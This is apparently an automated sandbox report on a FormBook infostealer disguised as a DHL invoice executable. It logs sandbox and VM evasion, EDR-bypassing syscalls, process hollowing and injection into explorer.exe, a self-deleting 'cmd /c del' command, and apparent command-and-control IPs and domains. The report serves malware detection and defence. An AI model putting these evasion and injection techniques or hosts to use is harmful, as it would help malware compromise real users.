Source: C:\Windows\explorer.exe	Code function: 3_2_080E49B5 push esp; retn 0000h	3_2_080E4AE7
Source: C:\Windows\explorer.exe	Code function: 3_2_080E4B02 push esp; retn 0000h	3_2_080E4B03
Source: C:\Windows\explorer.exe	Code function: 3_2_080E4B1E push esp; retn 0000h	3_2_080E4B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_090A0B02 push esp; retn 0000h	3_2_090A0B03
Source: C:\Windows\explorer.exe	Code function: 3_2_090A0B1E push esp; retn 0000h	3_2_090A0B1F
Source: C:\Windows\explorer.exe	Code function: 3_2_090A09B5 push esp; retn 0000h	3_2_090A0AE7
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0035262B push ecx; ret	4_2_0035263E
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0209DFA1 push ecx; ret	4_2_0209DFB4
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00080000 push C69438D7h; iretd	4_2_00080005
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_000991ED push ecx; iretd	4_2_000991EE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0008F365 pushad ; ret	4_2_0008F36D
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00098389 push esp; iretd	4_2_0009838B
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D4A5 push eax; ret	4_2_0009D4F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_000964DA push edi; retf	4_2_000964FE
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D4FB push eax; ret	4_2_0009D562
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D4F2 push eax; ret	4_2_0009D4F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0009D55C push eax; ret	4_2_0009D562

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	File created: \commercail invoice and dhl awb tracking details.exe
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	File created: \commercail invoice and dhl awb tracking details.exe			Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0125F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_0125F98E
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012D1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_012D1C41

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-98516

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	API/Special instruction interceptor: Address: 1B3204
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731C25A
Source: C:\Windows\SysWOW64\svchost.exe	API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BECA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731D51A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731C1DA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BFBA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BFDA
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731BE2A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731D26A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731C18A
Source: C:\Windows\SysWOW64\cscript.exe	API/Special instruction interceptor: Address: 7731C25A

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 89904 second address: 8990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe	RDTSC instruction interceptor: First address: 89B6E second address: 89B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4248	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5576	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 1595	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Window / User API: threadDelayed 1022	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Window / User API: threadDelayed 8948	Jump to behavior

Source: C:\Windows\explorer.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\cscript.exe	API coverage: 4.5 %

Source: C:\Windows\explorer.exe TID: 1964	Thread sleep time: -8496000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1340	Thread sleep time: -420000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1964	Thread sleep time: -11152000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep count: 1022 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep time: -2044000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep count: 8948 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe TID: 2064	Thread sleep time: -17896000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_012ADBBE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0127C2A2 FindFirstFileExW,	0_2_0127C2A2
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_012B698F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B68EE FindFirstFileW,FindClose,	0_2_012B68EE
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD076
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_012AD3A9
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B979D
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_012B9642
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_012B9B2B
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012B5C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_012B5C97
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_0035F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,	4_2_0035F0D3

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Source: explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000003.00000002.869194618.0000000003DDA000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}eeab7790
Source: explorer.exe, 00000003.00000000.349305261.00000000025E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0a
Source: explorer.exe, 00000003.00000002.869194618.0000000003E59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}100\4&20

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00409AA0 rdtsc

2_2_00409AA0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0040ACE0 LdrLoadDll,

2_2_0040ACE0

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012BEAA2 BlockInput,

0_2_012BEAA2

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_01272622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_01272622

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01264CE8 mov eax, dword ptr fs:[00000030h]	0_2_01264CE8
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B3470 mov eax, dword ptr fs:[00000030h]	0_2_001B3470
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B34D0 mov eax, dword ptr fs:[00000030h]	0_2_001B34D0
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_001B1E70 mov eax, dword ptr fs:[00000030h]	0_2_001B1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007200EA mov eax, dword ptr fs:[00000030h]	2_2_007200EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00720080 mov ecx, dword ptr fs:[00000030h]	2_2_00720080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_007426F8 mov eax, dword ptr fs:[00000030h]	2_2_007426F8
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_02080080 mov ecx, dword ptr fs:[00000030h]	4_2_02080080
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020800EA mov eax, dword ptr fs:[00000030h]	4_2_020800EA
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_020A26F8 mov eax, dword ptr fs:[00000030h]	4_2_020A26F8

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012A0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_012A0B62

Source: C:\Windows\SysWOW64\svchost.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_012609D5 SetUnhandledExceptionFilter,	0_2_012609D5
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01272622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01272622
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_0126083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0126083F
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Code function: 0_2_01260C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_01260C21
Source: C:\Windows\SysWOW64\cscript.exe	Code function: 4_2_00351335 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00351335

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 192.185.209.182 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 65.21.196.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.00050591.xyz
Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.32 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.thepowerofzeus.com
Source: C:\Windows\explorer.exe	Domain query: www.arthemis-168bet.site
Source: C:\Windows\explorer.exe	Domain query: www.kjsdhklssk73.xyz
Source: C:\Windows\explorer.exe	Domain query: www.alivioquantico.com
Source: C:\Windows\explorer.exe	Network Connect: 185.107.56.60 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.241.203.16 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.ilovetvs.com

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\cscript.exe	NtUnmapViewOfSection: Indirect: 0x5B9DB9	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	NtClose: Indirect: 0x5B9DC5
Source: C:\Windows\SysWOW64\cscript.exe	NtQueueApcThread: Indirect: 0x5BA531	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	NtMapViewOfSection: Indirect: 0x5B9D47	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	NtClose: Indirect: 0x38A56C
Source: C:\Windows\SysWOW64\svchost.exe	NtQueueApcThread: Indirect: 0x38A4F2	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 1244			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Thread register set: target process: 1244			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\svchost.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\svchost.exe

Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: 350000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008

Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012A1201

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_01282BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_01282BA5

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AB226 SendInput,keybd_event,

0_2_012AB226

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012AE355 mouse_event,

0_2_012AE355

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"			Jump to behavior

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

0_2_012A0B62

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012A1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_012A1663

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman-
Source: explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.348991178.0000000000720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.868662642.0000000000720000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: !Progman

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_01260698 cpuid

0_2_01260698

Source: C:\Windows\SysWOW64\cscript.exe	Code function: GetUserDefaultLCID,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,LoadLibraryExA,LoadLibraryExA,LoadLibraryExA,lstrlenA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,___swprintf_l,LoadLibraryExA,LoadLibraryExA,		4_2_00353030
Source: C:\Windows\SysWOW64\cscript.exe	Code function: GetLocaleInfoW,wcsncmp,		4_2_003641BC

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0127333F GetSystemTimeAsFileTime,

0_2_0127333F

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0129D27A GetUserNameW,

0_2_0129D27A

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_0127B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0127B952

Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe

Code function: 0_2_012442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_012442DE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_81
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_XP
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Binary or memory string: WIN_XPe
